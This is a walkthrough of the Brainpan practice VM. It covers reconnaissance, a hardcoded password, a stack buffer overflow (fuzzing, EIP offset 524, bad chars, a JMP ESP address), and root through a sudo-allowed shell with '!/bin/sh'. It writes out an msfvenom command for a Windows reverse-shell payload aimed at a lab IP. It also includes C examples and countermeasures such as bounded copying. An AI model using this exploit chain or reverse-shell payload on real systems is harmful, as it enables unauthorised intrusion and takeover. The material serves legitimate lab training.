Rooting Brainpan Walkthrough

Overview

Brainpan is a boot-to-root (B2R) virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting its vulnerabilities, leading to full system compromise.

Vulnerabilities Exploited:

  • Buffer overflow in Brainpan server application
  • Sudo misconfiguration
  • Outdated/vulnerable command shell anansi_util

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Brainpan in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • nc

Reconnaissance/Scanning

# netdiscover

Target VM IP Address: 192.168.8.103

nmap

# nmap -p- -sS -sV -A --webxml -oX brain-nmap.xml 192.168.8.103

Port 9999 is hosting a custom server that asks for a password to authenticate.

Tried a couple of passwords, but none of them worked. Let's move on to port 10000. It is a web server with a static page.

Found nothing fancy. Let's target the web server with DirBuster.

Found bin directory.

I downloaded and executed brainpan.exe on my Windows machine to examine its behavior. My Windows machine's IP address is 192.168.8.100.

Let's connect to this instance of brainpan.

So, we have confirmed that we have to crack this brainpan.exe binary to get access to the system.

Let's check if the password is hardcoded in the executable. We need to examine the strings in the executable.

On kali linux:

# wget http://192.168.8.102:10000/bin/brainpan.exe

# strings brainpan.exe > strings.txt

# cat strings.txt

It seems like “shitstorm” is the actual password.

Yes, access is granted, but the program exits as well.

Writing Buffer Overflow Exploit

Let's find the buffer overflow. If you are unfamiliar with writing buffer overflow exploits, please check the Corelan tutorials at https://www.corelan.be/

Step 1: Crash Target application through fuzzing.

Step 2: Find EIP Location

Step 3: Confirm EIP Location

Step 4: Find bad chars.

Step 5: Jump to shellcode instruction

Step 6: Generate shellcode payload with msfvenom and get reverse shell.

Step 7: Generate shellcode payload with msfvenom and get reverse shell for Linux.

Step 1: Crash Target application through fuzzing

We will fuzz the target application by sending strings whose length grows in multiples of 100 characters, and see whether the server crashes.

Python script that will fuzz the target application:

Fuzzer in action…

It seems we found a buffer overflow, since the application stopped responding once the buffer length reached 900.

Now, let's confirm by sending just a single array of 900 characters, and observe whether the application crashes.

Yes, the application crashed! The brainpan server application crashes with a buffer length of 900.

How can we analyze the application further, and use the buffer overflow to execute our own code on the server? Using Immunity Debugger!

Immunity Debugger is widely used for exploit writing and reverse engineering. You can download it from the official website by filling in the form at https://debugger.immunityinc.com/ID_register.py

After installation, run Immunity Debugger. Inside it, go to File->Open, locate the brainpan executable, and start the program by clicking the play button in the toolbar.

Run step1.py again to crash the brainpan server application by triggering the buffer overflow.

Step 2: Find EIP Location

Modify step1.py into step2.py so that the junk is now a unique 900-byte pattern, and execute step2.py.

EIP is overwritten with 35724134, which is at position 524 from the start of the pattern.
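To show where the figure 524 comes from, here is an added C example (not the walkthrough's step2.py and not Metasploit's own tool). It builds a cyclic pattern with the same layout as Metasploit's pattern_create (Aa0Aa1Aa2…, in which every 4-byte window is unique), undoes the x86 little-endian byte order of the value the debugger showed in EIP, and searches the pattern for those four bytes. The function names and the 900-byte length are this example's own assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Write up to 'len' bytes of the cyclic pattern into 'out' (plus a NUL).
   Layout follows Metasploit's pattern_create: Aa0Aa1...Aa9Ab0...Zz9.
   'out' must have room for len + 1 bytes. */
void pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                char triplet[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = triplet[i];
            }
    out[n] = '\0';
}

/* Given the EIP value as the debugger prints it (hex, e.g. "35724134") and
   the pattern length that was sent, reverse the little-endian byte order and
   look those 4 bytes up in the pattern. Returns the offset of the bytes that
   landed in EIP, or -1 if they do not occur (EIP was not overwritten by the
   pattern, or a byte of the value is 0 and cuts the search string short). */
long pattern_offset(const char *eip_hex, size_t pattern_len)
{
    unsigned long v = strtoul(eip_hex, NULL, 16);
    /* Little-endian: the lowest byte of the register was first in memory. */
    char needle[5] = {
        (char)(v & 0xff), (char)((v >> 8) & 0xff),
        (char)((v >> 16) & 0xff), (char)((v >> 24) & 0xff), '\0'
    };
    char *pattern = malloc(pattern_len + 1);
    if (pattern == NULL)
        return -1;
    pattern_create(pattern, pattern_len);
    char *hit = strstr(pattern, needle);
    long offset = hit ? (long)(hit - pattern) : -1;
    free(pattern);
    return offset;
}

int main(void)
{
    /* The value from this step: 35724134 in EIP after a 900-byte pattern. */
    printf("EIP 35724134 -> offset %ld\n", pattern_offset("35724134", 900));
    return 0;
}
```

Bytes 0x34 0x41 0x72 0x35 spell "4Ar5", which is the end of triplet "Ar4" followed by the start of "Ar5"; the triplet "Ar4" sits at 3 × (17 × 10 + 4) = 522, so the match begins at 524, the same offset the walkthrough reports.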

Step 3: Confirm EIP Location

Let's confirm that 524 is the correct position by writing BBBB at offset 524.

Yes, confirmed: EIP is overwritten with BBBB.

Step 4: Find bad chars

What are bad chars? Bad chars are characters that, when they are part of the buffer overflow array/string, prevent the overflow from triggering as intended. For example, strcpy copies the whole source string to the destination string until it finds a null character; at the null character strcpy stops copying from source to destination. In this case the null character is a bad char, because it stops the remaining characters from being copied from the source to the destination string. Let's generate all characters with this Python script.

So, I added allChars after the string which is already overwriting EIP and 20 NOPs, and observed the stack status.

I found that \x00 is the only bad char. As you can see, the stack displays all chars after the 20 NOPs.

Step 5: Jump to shellcode instruction

As you can see in the above screenshot, ESP is pointing to the stack, where our input buffer is written. If we overwrite EIP with the address of a JMP ESP instruction that is already in memory, program control will move execution to the stack. Let's find a JMP ESP instruction in the Brainpan module.

The instruction at memory address 311712f3 is JMP ESP. Writing this address in little-endian form:

EIP = "\xf3\x12\x17\x31"

Step 6: Generate shellcode payload with msfvenom and get reverse shell.

msfvenom -a x86 --platform win -p windows/shell/reverse_tcp LHOST=192.168.8.102 LPORT=8080 -b '\x00' -e x86/shikata_ga_nai -f python

Add this shellcode to the attacking script as:

#step6.py

And we received reverse shell!

Step 7: Generate shellcode payload with msfvenom and get reverse shell for Linux

Now it is time to generate shellcode for the Linux machine.

Adding the Linux reverse shell payload to the attacking script:

And we received a shell!

Priv Escalation

User puck is a sudo/privileged user, allowed to run anansi_util, which is basically a command shell that is still under development and vulnerable to command execution.

anansi_util can be made to execute commands as root when run with sudo.

Just add !/bin/sh and we are root.

Countermeasure:

  • Buffer overflow in Brainpan server application

Install the patch for the Brainpan server! 🙂 If Brainpan is an in-house developed server application, then use strncpy instead of strcpy. Is Brainpan using strcpy? Yes, I decompiled Brainpan using an online website, and here is the function. So, the password length should be restricted to a certain maximum length.
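The following added C example (not Brainpan's decompiled code) puts the unbounded strcpy pattern beside a bounded replacement, and also illustrates the Step 4 point that strcpy stops at the first null byte. PASSWORD_BUF, the function names and the 'A'-filled probe are assumptions of this example; the page does not state the real size of brainpan.exe's password buffer.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for this example. The real size in brainpan.exe is not
   given on this page; the EIP offset of 524 only says how far the saved
   return address sits from the start of the buffer. */
#define PASSWORD_BUF 64

/* Vulnerable pattern: strcpy copies until the first NUL and knows nothing
   about the size of 'buf'. Input longer than PASSWORD_BUF runs past the end
   of the stack frame, which is what the 900-byte junk exploits. It is shown
   here only for the shape of the bug; call it only with input that fits. */
int check_password_unbounded(const char *input, const char *expected)
{
    char buf[PASSWORD_BUF];
    strcpy(buf, input);            /* no length check at all */
    return strcmp(buf, expected) == 0;
}

/* Why \x00 is a "bad char": strcpy (like strlen) stops at the first NUL, so
   nothing after it ever reaches the destination. Returns how many bytes
   strcpy would actually copy from 'input'. */
size_t bytes_strcpy_would_copy(const char *input)
{
    return strlen(input);
}

/* Hardened version: the caller supplies the received length, over-long input
   is rejected outright instead of being silently truncated, and the copy is
   bounded. strncpy writes no terminator when it copies the full count, so the
   NUL is added explicitly. Returns 1 on match, 0 on mismatch, -1 if rejected. */
int check_password_bounded(const char *input, size_t len, const char *expected)
{
    char buf[PASSWORD_BUF];
    if (len >= sizeof buf)         /* leave room for the terminator */
        return -1;                 /* reject: would not fit */
    strncpy(buf, input, len);      /* copies at most len bytes */
    buf[len] = '\0';
    return strcmp(buf, expected) == 0;
}

/* Send an n-byte run of 'A' (constructed, like the walkthrough's junk)
   through the bounded check. Returns -2 if n exceeds this probe's own buffer. */
int probe_bounded_with_junk(size_t n)
{
    char junk[4096];
    if (n >= sizeof junk)
        return -2;
    memset(junk, 'A', n);
    junk[n] = '\0';
    return check_password_bounded(junk, n, "shitstorm");
}

int main(void)
{
    printf("bounded, correct password: %d\n",
           check_password_bounded("shitstorm", 9, "shitstorm"));
    printf("bounded, 900 bytes of junk: %d (rejected)\n",
           probe_bounded_with_junk(900));
    printf("bytes strcpy copies from \"AAAA\\0BBBB\": %zu\n",
           bytes_strcpy_would_copy("AAAA\0BBBB"));
    return 0;
}
```

Rejecting rather than truncating matters: with plain strncpy and no length check, a 900-byte password would still be accepted for comparison after truncation, which hides the malformed input from any logging or alerting around the server.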

  • Sudo misconfiguration

Do not grant sudo permission to vulnerable software.

  • Outdated/vulnerable command shell anansi_util

Do not install vulnerable software on the server.
